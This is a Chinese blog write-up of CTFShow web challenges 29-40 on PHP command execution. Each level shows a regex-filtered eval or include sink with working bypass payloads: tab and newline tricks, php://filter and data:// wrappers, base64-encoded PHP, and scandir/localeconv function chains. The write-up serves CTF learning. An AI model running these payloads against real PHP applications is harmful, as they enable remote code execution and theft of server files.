CTFShow-WEB入门篇命令执行详细Wp(29-40)

已于 2024-01-17 16:13:16 修改
阅读量2.4k 收藏 15
点赞数 12
分类专栏: CTF 文章标签: php 开发语言 Web安全 CTF 命令执行
于 2023-06-10 15:38:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/131024590
版权

WEB入门篇--命令执行详细Wp

CTFShow 平台:https://ctf.show/

命令执行:

Web29:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

preg_match():函数执行一个正则表达式匹配。

这里过滤了flag/i 过滤的不是很多就两个所以方法有很多种

?c=system('tac f*');
?c=system("cp fla?.php 1.txt");#然后访问1.txt

在这里插入图片描述

在这里插入图片描述

ctfshow{f6702830-5d6b-4cfb-9678-4ae7fa2ba198}

Web30:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag、system、php 其实还可以使用上面的方法换一个命令执行函数即可。

命令执行函数:passthru、shell_exec、exec等 其实这里还可以使用反引号 `

`反引号和shell_exec意思相同在php中称之为执行运算符,PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回

?c=echo `tac f*`;
?c=passthru('tac f*');

在这里插入图片描述
在这里插入图片描述

ctfshow{c2ef0b5a-047d-4242-8567-daea91a6e06b}

Web31:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这里又过滤了cat sort 和空格 可以使用使用空格绕过(%09) 也可也使用&拼接使用eval函数可以使用POST和GET其实一样的

c=eval($_GET[cmd]);&cmd=system("tac f*");
?c=echo (`tac%09f*`);

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

ctfshow{e66df5c7-07fb-4e6e-bcbb-46b209308c9d}

web32:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这里又过滤了反斜杠,echo,分号,括号 这里可以使用include函数可以不用括号 实现文件包含 配合伪协议 分号可以使用>? 代替

PS:我们只需要知道 过滤了参数可以使用代替进行绕过就行了这是做题的思路 还是很好理解的

php://filter/read=convert.base64-encode/resource=flag.php #伪协议
?c=include_GET[cmd]>?&cmd=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述

ctfshow{22eca81d-7663-4150-bc72-57825852ad03}

web33:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤 了双引号 这里还是和上面那题一样的Payload就可以没啥新的知识点!

?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述
在这里插入图片描述

ctfshow{34945d8a-89fa-48b8-919a-883dc71f740c}

web34:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这里多了冒号好像,这里也是一样的Payload,但是我们这里用别的伪协议data://进行测试

?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>

在这里插入图片描述

在这里插入图片描述

ctfshow{1378052e-d82c-446b-9e8d-5c1249ec1001}

web35:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了,=号和<括号这里可以使用database64 把要执行的命令加密了传进去<?php system("cat flag.php");?>

?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>
?c=include$_GET[cmd]?>&cmd=data://text/plan;base64;PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
#到这里有三种方法可以使用

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

ctfshow{2529c316-96d3-442b-9642-2135d3cb9904}

web36:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这里过滤了数字0-9 还是可以使用上面的PayLoad只要传参的不是数字就行

?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>

在这里插入图片描述

ctfshow{ece6bc01-4a5c-4d30-b638-c8e77800d3f5}

web37:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

这里过滤了flag 有文件包含了 可以使用伪协议

?c=php://filter/read=convert.base64-encode/resource=flag.php #这里过滤了flag不要使用这一条没用 我只是都想测一遍用下面两个
?c=data://text/palin,<?php system("tac f*");?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZioiKTs/Pg==

在这里插入图片描述
在这里插入图片描述

ctfshow{472ace50-bae6-472b-b9a3-1c9631a2c34d}

web38:

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

这里过滤了phpfile 所以可以使用短标签‘<?=’是PHP的一个短的开放式标签

?c=data://text/palin,<?php system("tac f*");?> #(使用不了用第二个我只是进行对比)这里php被过滤了使用不了可以改为短标签
?c=data://text/palin,<?=system("tac f*");?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZioiKTs/Pg==

在这里插入图片描述

ctfshow{42276d5b-2bb2-419a-9eba-7d93704753dd}

web39:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

?c=data://text/palin,<?=system("tac f*");?>
?c=data://text/palin,<?php system("tac f*");?>

在这里插入图片描述

ctfshow{831f530f-d4d3-4ae5-91e7-1e8093d194e8}

web40:

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

过滤了很多字符 有大写得括号 这里得考点是:无参数文件读取

无参数的意思可以是a()、a(b())a(b(c())),但不能是a('b')a('b','c'),不能带参数

localeconv() 函数返回一包含本地数字及货币格式信息的数组。
current() 函数返回数组中的当前元素(单元),默认取第一个值,
pos()current() ,是current()的别名
reset() 函数返回数组第一个单元的值,如果数组为空则返回 FALSE
array_reverse():数组逆序
array_flip()是交换数组的键和值

?c=print_r(show_source(array_rand(array_flip(scandir(pos(localeconv()))))));
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
next(): 函数将内部指针指向数组中的下一个元素,并输出。
?c=print_r(scandir(current(localeconv())));
scandir(current(localeconv())) 查看当前目录所有文件名
?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

在这里插入图片描述
在这里插入图片描述

ctfshow{272b2a98-1f96-4742-bfab-f2893df46d9e}

在这里插入图片描述
至此29-40就完结了 希望对刚入门对Web感兴趣得小伙伴有帮助 感谢大家支持~ 我们下一篇见!

落寞的魚丶
关注
  • 12
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
CTFshow 命令执行 web40
Kradress的博客
10-30 1649
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c = $_GET['c'];
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTF练习】Ctfshow入门 爆破(21-24)
Lush_hair_Dl的博客
03-10 1690
爆破题常用的工具就是bp的Intruder模块,将抓到的包发送到Repeater(点击action会有相应选项),用字典爆破:本题是一个登录窗口,首先第一步就是先输入用户名为:admin(一般没有额外提示就这么猜),密码随便输(此处输入111),然后登录。这一过程的目的是为了抓包查看爆破点有的时候抓包会直接看到用户名和密码的位置,这里就不能直接看到,此处将用户名和密码进行base64加密(对于一串字符后有=,基本就要猜测这一串数据是否是base64加密,解密看看是否有什么信息),解密后发现是。
[web安全学习] ctfshow-php特性总结
Y1seco的博客
07-30 1283
文章目录一. 常见php函数1. intval2. strpos3. is_numeric4. var_dump()5. call_user_func()函数5. parse_str6. strrev7.二. 常见绕过方法尝试添加加号+和空格进行绕过进制绕过采用伪协议绕过如:数组绕过三目运算符+变量覆盖PHP弱类型比较and与&&的区别+反射类ReflectionClass的使用绕过is_numericPHP变量覆盖ereg %00正则截断绕过正则FilesystemIterator类的使用
最新CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web,2024年最新看这篇文章就行了
最新发布
2401_84264244的博客
05-13 919
index.phps。
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 2264
纯粹学安全
ctfshow(web入门)
qq_62553635的博客
01-15 1618
第三题 根据提示直接bp抓包 发送到repeater查看响应包 得flag
CTFShow-Web入门
weixin_58546222的博客
12-04 2310
CTFShow-信息收集
CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)
热门推荐
路baby的博客
02-10 1万+
CTFshow菜狗-misc-wp(详解 脚本 过程 全) 所以misc 杂项签到 损坏的压缩包 谜之栅栏 你会数数吗 你会异或吗flag一分为二 我是谁?? You and me 7.1.05 黑丝白丝还有什么丝? 我吐了你随意这是个什么文件? 抽象画 迅疾响应 我可没有骗你 你被骗了 一闪一闪亮晶晶 一层一层一层地剥开我的◇ 打不开的图片
CTFshow-Web入门-Web1-20 (信息收集完结篇)
m0_61155226的博客
03-07 7599
CTFshow-Web入门-Web11-20 (信息收集完结篇)
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
**WP-CLI(WordPress Command Line Interface)是WordPress开发和管理中的一个强大工具,它允许用户通过命令行界面执行各种操作,而无需通过图形用户界面。本教程将带你深入理解WP-CLI,包括如何安装、使用基础命令...
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
Gil-Web-Cache-Deception-Attack-wp.zip
10-25
Gil Tene的文档"us-17-Gil-Web-Cache-Deception-Attack-wp.pdf"很可能是详细阐述了这些攻击手段,包括它们的工作原理、影响范围以及如何检测和防御。这份文档对于网络安全专家、Web开发者和系统管理员来说是重要的...
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3868
ctfshow 每周大挑战 极限命令执行 wp
CTFshow 1-10关
weixin_62369433的博客
11-11 2159
CTFshow 1-10 通关详解
CTFshow 菜狗杯 web方向 全
Jay17的博客
09-01 2323
CTFshow 菜狗杯 web方向 全
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 4917
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 <?php include("flag.php"); highlight_file(__
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1855
ctfshow pwn入门-前置基础pwn13-pwn19
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。而引用中提到,萌新隐写题目可能是纯签到题,可以在公告中找到或者输入萌新码。根据这些信息,我们可以得出结论,ctfshow-__萌新隐写也是CTFShow "萌心区"WP详解(上)中关于隐写的一道题目。 请注意,我无法提供具体的题目内容和解答,因为您没有提供更多细节。如果您需要更详细的答案,请提供更多相关的信息,我将尽力帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值